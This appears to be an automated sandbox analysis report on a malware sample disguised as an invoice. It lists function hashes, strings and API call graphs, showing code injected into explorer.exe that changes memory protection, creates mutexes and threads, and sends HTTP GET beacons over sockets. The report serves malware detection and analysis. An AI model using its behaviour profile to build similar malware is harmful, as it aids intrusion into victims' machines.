                                            • Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
                                            Function 01132410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
                                            • Instruction ID: 1a7d08cffb5de6faea4249717a3473130f4d0d32e7806a0f73c9f429f02c4ced
                                            • Opcode Fuzzy Hash: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
                                            • Instruction Fuzzy Hash: 46510971A04745AEDB38EF5CC8909BFBBF8EF84200B448459E5DAD7689D7B4EA40C760
                                            Function 010B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
                                            • ExecuteOptions, xrefs: 010F46A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
                                            • Execute=1, xrefs: 010F4713
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
                                            • Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50
                                            Function 010CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51
                                            Function 011320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
                                            • Instruction ID: fa971edff0f732f0dd21dc2c6fa3192b6399ee27de4c59c062fa6d7d1b945f9a
                                            • Opcode Fuzzy Hash: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
                                            • Instruction Fuzzy Hash: 8621657AE00219ABDB24EF79CD40AFEBBF8EF94640F04011AE945D7204E730D9018BE1
                                            Function 010AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                            • Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
                                            • Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                            • Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42
                                            Function 010BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                            • RTL: Re-Waiting, xrefs: 010F7BAC
                                            • RTL: Resource at %p, xrefs: 010F7B8E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
                                            • Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92
                                            Function 010BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F72C1
                                            • RTL: Resource at %p, xrefs: 010F72A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
                                            • Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2
                                            Function 01132300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
                                            • Instruction ID: 03f516b2222179af8eb517738fe2e067a1fecaee5464c3e6a0241b6a24e91b48
                                            • Opcode Fuzzy Hash: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
                                            • Instruction Fuzzy Hash: 13318672A002199FDB24DF2DCC40BEE77F8EB44610F44455AE949E3204EB30AA448FA0
                                            Function 010C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11
                                            Function 01089126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
                                            • Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0
                                            Function 0110CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                            Download Yara Rule
                                            APIs
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0110CFBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8
                                            • String ID: @$@4Cw@4Cw
                                            • API String ID: 4062629308-3101775584
                                            • Opcode ID: c1bdda9f9d406adda4f4736fabc68d365181e547836b7b3fe15f08e3e9616943
                                            • Instruction ID: 46fa8f8b3c68b02d64a169b8c36c2d10f5b2c89f26e703414efa5930f218ae2d
                                            • Opcode Fuzzy Hash: c1bdda9f9d406adda4f4736fabc68d365181e547836b7b3fe15f08e3e9616943
                                            • Instruction Fuzzy Hash: 18418C71D00619DFDB2ADFE9D840AAEBBB8FF54B40F00412AE955DB398D7708841DB62

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:11.4%
                                            Total number of Nodes:79
                                            Total number of Limit Nodes:9
                                            execution_graph 20204 10f942dd 20208 10f9431a 20204->20208 20205 10f943fa 20206 10f94328 SleepEx 20206->20206 20206->20208 20208->20205 20208->20206 20211 10f9ef12 7 API calls 20208->20211 20212 10f95432 NtCreateFile 20208->20212 20213 10f940f2 6 API calls 20208->20213 20211->20208 20212->20208 20213->20208 20214 10fa0bac 20215 10fa0bb1 20214->20215 20248 10fa0bb6 20215->20248 20249 10f96b72 20215->20249 20217 10fa0c2c 20218 10fa0c85 20217->20218 20219 10fa0c69 20217->20219 20220 10fa0c54 20217->20220 20217->20248 20263 10f9eab2 NtProtectVirtualMemory 20218->20263 20223 10fa0c6e 20219->20223 20224 10fa0c80 20219->20224 20259 10f9eab2 NtProtectVirtualMemory 20220->20259 20261 10f9eab2 NtProtectVirtualMemory 20223->20261 20224->20218 20229 10fa0c97 20224->20229 20225 10fa0c8d 20264 10f98102 ObtainUserAgentString NtProtectVirtualMemory 20225->20264 20227 10fa0c5c 20260 10f97ee2 ObtainUserAgentString NtProtectVirtualMemory 20227->20260 20230 10fa0cbe 20229->20230 20231 10fa0c9c 20229->20231 20235 10fa0cd9 20230->20235 20236 10fa0cc7 20230->20236 20230->20248 20253 10f9eab2 NtProtectVirtualMemory 20231->20253 20233 10fa0c76 20262 10f97fc2 ObtainUserAgentString NtProtectVirtualMemory 20233->20262 20235->20248 20267 10f9eab2 NtProtectVirtualMemory 20235->20267 20265 10f9eab2 NtProtectVirtualMemory 20236->20265 20239 10fa0ccf 20266 10f982f2 ObtainUserAgentString NtProtectVirtualMemory 20239->20266 20241 10fa0cac 20254 10f97de2 ObtainUserAgentString 20241->20254 20243 10fa0ce5 20268 10f98712 ObtainUserAgentString NtProtectVirtualMemory 20243->20268 20246 10fa0cb4 20255 10f94412 20246->20255 20250 10f96b93 20249->20250 20251 10f96cce 20250->20251 20252 10f96cb5 CreateMutexW 20250->20252 20251->20217 20252->20251 20253->20241 20254->20246 20257 10f94440 20255->20257 20256 10f94473 20256->20248 20257->20256 20258 10f9444d CreateThread 20257->20258 20258->20248 20259->20227 20260->20248 20261->20233 20262->20248 20263->20225 20264->20248 20265->20239 20266->20248 20267->20243 20268->20248 20269 10fa0e12 20273 10f9f942 20269->20273 20271 10fa0e45 NtProtectVirtualMemory 20272 10fa0e70 20271->20272 20274 10f9f967 20273->20274 20274->20271 20275 10f9f232 20277 10f9f25c 20275->20277 20278 10f9f334 20275->20278 20276 10f9f410 NtCreateFile 20276->20278 20277->20276 20277->20278 20279 10f9ff82 20280 10f9ffb8 20279->20280 20283 10fa0081 20280->20283 20290 10fa0022 20280->20290 20291 10f9c5b2 20280->20291 20282 10fa0134 20289 10fa01b2 20282->20289 20282->20290 20294 10f9c732 20282->20294 20283->20282 20285 10fa0117 getaddrinfo 20283->20285 20283->20290 20285->20282 20287 10fa07f4 setsockopt recv 20287->20290 20288 10fa0729 20288->20287 20288->20290 20289->20290 20297 10f9c6b2 20289->20297 20292 10f9c60a socket 20291->20292 20293 10f9c5ec 20291->20293 20292->20283 20293->20292 20295 10f9c788 connect 20294->20295 20296 10f9c76a 20294->20296 20295->20289 20296->20295 20298 10f9c705 send 20297->20298 20299 10f9c6e7 20297->20299 20298->20288 20299->20298 20300 10f9a8c2 20302 10f9a934 20300->20302 20301 10f9a9a6 20302->20301 20303 10f9a995 ObtainUserAgentString 20302->20303 20303->20301

                                            Executed Functions

                                            Function 10F9FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 10f9ff82-10f9ffb6 1 10f9ffb8-10f9ffbc 0->1 2 10f9ffd6-10f9ffd9 0->2 1->2 3 10f9ffbe-10f9ffc2 1->3 4 10fa08fe-10fa090c 2->4 5 10f9ffdf-10f9ffed 2->5 3->2 6 10f9ffc4-10f9ffc8 3->6 7 10f9fff3-10f9fff7 5->7 8 10fa08f6-10fa08f7 5->8 6->2 9 10f9ffca-10f9ffce 6->9 10 10f9fff9-10f9fffd 7->10 11 10f9ffff-10fa0000 7->11 8->4 9->2 12 10f9ffd0-10f9ffd4 9->12 10->11 13 10fa000a-10fa0010 10->13 11->13 12->2 12->5 14 10fa003a-10fa0060 13->14 15 10fa0012-10fa0020 13->15 17 10fa0068-10fa007c call 10f9c5b2 14->17 18 10fa0062-10fa0066 14->18 15->14 16 10fa0022-10fa0026 15->16 16->8 21 10fa002c-10fa0035 16->21 22 10fa0081-10fa00a2 17->22 18->17 19 10fa00a8-10fa00ab 18->19 23 10fa00b1-10fa00b8 19->23 24 10fa0144-10fa0150 19->24 21->8 22->19 25 10fa08ee-10fa08ef 22->25 26 10fa00ba-10fa00dc call 10f9f942 23->26 27 10fa00e2-10fa00f5 23->27 24->25 28 10fa0156-10fa0165 24->28 25->8 26->27 27->25 32 10fa00fb-10fa0101 27->32 29 10fa017f-10fa018f 28->29 30 10fa0167-10fa0178 call 10f9c552 28->30 34 10fa0191-10fa01ad call 10f9c732 29->34 35 10fa01e5-10fa021b 29->35 30->29 32->25 37 10fa0107-10fa0109 32->37 43 10fa01b2-10fa01da 34->43 40 10fa022d-10fa0231 35->40 41 10fa021d-10fa022b 35->41 37->25 42 10fa010f-10fa0111 37->42 45 10fa0233-10fa0245 40->45 46 10fa0247-10fa024b 40->46 44 10fa027f-10fa0280 41->44 42->25 47 10fa0117-10fa0132 getaddrinfo 42->47 43->35 49 10fa01dc-10fa01e1 43->49 48 10fa0283-10fa02e0 call 10fa0d62 call 10f9d482 call 10f9ce72 call 10fa1002 44->48 45->44 50 10fa024d-10fa025f 46->50 51 10fa0261-10fa0265 46->51 47->24 52 10fa0134-10fa013c 47->52 63 10fa02e2-10fa02e6 48->63 64 10fa02f4-10fa0354 call 10fa0d92 48->64 49->35 50->44 54 10fa026d-10fa0279 51->54 55 10fa0267-10fa026b 51->55 52->24 54->44 55->48 55->54 63->64 65 10fa02e8-10fa02ef call 10f9d042 63->65 69 10fa035a-10fa0396 call 10fa0d62 call 10fa1262 call 10fa1002 64->69 70 10fa048c-10fa04b8 call 10fa0d62 call 10fa1262 64->70 65->64 85 10fa03bb-10fa03e9 call 10fa1262 * 2 69->85 86 10fa0398-10fa03b7 call 10fa1262 call 10fa1002 69->86 79 10fa04ba-10fa04d5 70->79 80 10fa04d9-10fa0590 call 10fa1262 * 3 call 10fa1002 * 2 call 10f9d482 70->80 79->80 112 10fa0595-10fa05b9 call 10fa1262 80->112 100 10fa03eb-10fa0410 call 10fa1002 call 10fa1262 85->100 101 10fa0415-10fa041d 85->101 86->85 100->101 104 10fa041f-10fa0425 101->104 105 10fa0442-10fa0448 101->105 109 10fa0467-10fa0487 call 10fa1262 104->109 110 10fa0427-10fa043d 104->110 111 10fa044e-10fa0456 105->111 105->112 109->112 110->112 111->112 116 10fa045c-10fa045d 111->116 121 10fa05bb-10fa05cc call 10fa1262 call 10fa1002 112->121 122 10fa05d1-10fa06ad call 10fa1262 * 7 call 10fa1002 call 10fa0d62 call 10fa1002 call 10f9ce72 call 10f9d042 112->122 116->109 133 10fa06af-10fa06b3 121->133 122->133 135 10fa06ff-10fa072d call 10f9c6b2 133->135 136 10fa06b5-10fa06fa call 10f9c382 call 10f9c7b2 133->136 145 10fa072f-10fa0735 135->145 146 10fa075d-10fa0761 135->146 158 10fa08e6-10fa08e7 136->158 145->146 147 10fa0737-10fa074c 145->147 148 10fa090d-10fa0913 146->148 149 10fa0767-10fa076b 146->149 147->146 152 10fa074e-10fa0754 147->152 153 10fa0779-10fa0784 148->153 154 10fa0919-10fa0920 148->154 155 10fa08aa-10fa08df call 10f9c7b2 149->155 156 10fa0771-10fa0773 149->156 152->146 159 10fa0756 152->159 160 10fa0786-10fa0793 153->160 161 10fa0795-10fa0796 153->161 154->160 155->158 156->153 156->155 158->25 159->146 160->161 164 10fa079c-10fa07a0 160->164 161->164 167 10fa07a2-10fa07af 164->167 168 10fa07b1-10fa07b2 164->168 167->168 170 10fa07b8-10fa07c4 167->170 168->170 173 10fa07c6-10fa07ef call 10fa0d92 call 10fa0d62 170->173 174 10fa07f4-10fa0861 setsockopt recv 170->174 173->174 175 10fa08a3-10fa08a4 174->175 176 10fa0863 174->176 175->155 176->175 180 10fa0865-10fa086a 176->180 180->175 184 10fa086c-10fa0872 180->184 184->175 186 10fa0874-10fa08a1 184->186 186->175 186->176
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: 9960522eff974bf33b7c22a1f64378a1a31e62032959399caa8a1a9a83144af2
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: 6752AC30618A488FC758EF68D4867EAB7E1FB54300F51462EE4AFC7146EE34B949CB91
                                            Function 10F9F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 299 10f9f232-10f9f256 300 10f9f8bd-10f9f8cd 299->300 301 10f9f25c-10f9f260 299->301 301->300 302 10f9f266-10f9f2a0 301->302 303 10f9f2bf 302->303 304 10f9f2a2-10f9f2a6 302->304 306 10f9f2c6 303->306 304->303 305 10f9f2a8-10f9f2ac 304->305 307 10f9f2ae-10f9f2b2 305->307 308 10f9f2b4-10f9f2b8 305->308 309 10f9f2cb-10f9f2cf 306->309 307->306 308->309 312 10f9f2ba-10f9f2bd 308->312 310 10f9f2f9-10f9f30b 309->310 311 10f9f2d1-10f9f2f7 call 10f9f942 309->311 316 10f9f378 310->316 317 10f9f30d-10f9f332 310->317 311->310 311->316 312->309 320 10f9f37a-10f9f3a0 316->320 318 10f9f3a1-10f9f3a8 317->318 319 10f9f334-10f9f33b 317->319 321 10f9f3aa-10f9f3d3 call 10f9f942 318->321 322 10f9f3d5-10f9f3dc 318->322 323 10f9f33d-10f9f360 call 10f9f942 319->323 324 10f9f366-10f9f370 319->324 321->316 321->322 326 10f9f3de-10f9f40a call 10f9f942 322->326 327 10f9f410-10f9f458 NtCreateFile call 10f9f172 322->327 323->324 324->316 329 10f9f372-10f9f373 324->329 326->316 326->327 335 10f9f45d-10f9f45f 327->335 329->316 335->316 336 10f9f465-10f9f46d 335->336 336->316 337 10f9f473-10f9f476 336->337 338 10f9f478-10f9f481 337->338 339 10f9f486-10f9f48d 337->339 338->320 340 10f9f48f-10f9f4b8 call 10f9f942 339->340 341 10f9f4c2-10f9f4ec 339->341 340->316 346 10f9f4be-10f9f4bf 340->346 347 10f9f8ae-10f9f8b8 341->347 348 10f9f4f2-10f9f4f5 341->348 346->341 347->316 349 10f9f4fb-10f9f4fe 348->349 350 10f9f604-10f9f611 348->350 351 10f9f55e-10f9f561 349->351 352 10f9f500-10f9f507 349->352 350->320 354 10f9f567-10f9f572 351->354 355 10f9f616-10f9f619 351->355 356 10f9f509-10f9f532 call 10f9f942 352->356 357 10f9f538-10f9f559 352->357 359 10f9f5a3-10f9f5a6 354->359 360 10f9f574-10f9f59d call 10f9f942 354->360 362 10f9f6b8-10f9f6bb 355->362 363 10f9f61f-10f9f626 355->363 356->316 356->357 364 10f9f5e9-10f9f5fa 357->364 359->316 366 10f9f5ac-10f9f5b6 359->366 360->316 360->359 367 10f9f739-10f9f73c 362->367 368 10f9f6bd-10f9f6c4 362->368 370 10f9f628-10f9f651 call 10f9f942 363->370 371 10f9f657-10f9f66b call 10fa0e92 363->371 364->350 366->316 376 10f9f5bc-10f9f5e6 366->376 372 10f9f742-10f9f749 367->372 373 10f9f7c4-10f9f7c7 367->373 377 10f9f6f5-10f9f734 368->377 378 10f9f6c6-10f9f6ef call 10f9f942 368->378 370->316 370->371 371->316 388 10f9f671-10f9f6b3 371->388 381 10f9f74b-10f9f774 call 10f9f942 372->381 382 10f9f77a-10f9f7bf 372->382 373->316 384 10f9f7cd-10f9f7d4 373->384 376->364 392 10f9f894-10f9f8a9 377->392 378->347 378->377 381->347 381->382 382->392 389 10f9f7fc-10f9f803 384->389 390 10f9f7d6-10f9f7f6 call 10f9f942 384->390 388->320 396 10f9f82b-10f9f835 389->396 397 10f9f805-10f9f825 call 10f9f942 389->397 390->389 392->320 396->347 399 10f9f837-10f9f83e 396->399 397->396 399->347 403 10f9f840-10f9f886 399->403 403->392
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: 4dafe4dd4c6ff29583f2a39d668b02094ac26df8164d1ed9b536f7952dd86bb6
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: BF226B70A18A099FDB89DF28C4967AEF7E1FB98311F51422EE45ED3250DB30E855CB81
                                            Function 10FA0E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 443 10fa0e12-10fa0e6e call 10f9f942 NtProtectVirtualMemory 446 10fa0e7d-10fa0e8f 443->446 447 10fa0e70-10fa0e7c 443->447
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10FA0E67
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: eeba7b3727fe7bbd8b30e51d13a4a1faf8e17195461ea1b44046fcd75f72b08e
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 01017134668B884F9788EF6CE48522AB7E4FBDD315F000B3EE99AC7254EB74D5418742
                                            Function 10FA0E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 448 10fa0e0a-10fa0e38 449 10fa0e45-10fa0e6e NtProtectVirtualMemory 448->449 450 10fa0e40 call 10f9f942 448->450 451 10fa0e7d-10fa0e8f 449->451 452 10fa0e70-10fa0e7c 449->452 450->449
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 10FA0E67
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
